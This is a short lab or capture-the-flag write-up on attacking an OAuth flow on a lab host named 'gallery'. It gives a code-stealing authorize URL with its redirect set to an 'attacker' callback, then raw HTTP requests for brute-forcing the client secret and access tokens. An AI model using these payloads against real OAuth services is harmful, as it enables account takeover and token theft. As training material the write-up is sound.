Attacking OAuth

Task 1. Create a code stealing PoC Craft an URL that can be sent to a victim in order to steal the authorization code once he/she logs in into the /oauth endpoint. You can use the following data: the response type is "code", the scope is "view_gallery" and the client_id is "photoprint".

Task 2. Use the acquired code to bruteforce the client secret Use a POST request to the /token endpoint in order to bruteforce the client secret. Consult with OAuth's documentation to recreate the request. The grant type is "authorization_code"

Task 3. Discover another token vulnerability Discover another vulnerability by abusing the /photos/me?access_token= endpoint.

Task 1

The vulnerability is an unvalidated redirect. Using a code snippet example below, if a user is sent this link and then logs in the attacker will be sent the code.

http://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fattacker%2Fcallback&scope=view_gallery&client_id=photoprint

Task 2

After recieving the request, send it to intruder to try to bruteforce the secret.

POST /token HTTP/1.1
Host: gallery:3005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


redirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=§guess§&code=44438

Update the request.

Now send the token.

GET /photos/me?access_token=35580 HTTP/1.1
Host: gallery:3005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Task 3

Alternatively you can bruteforce a valid token.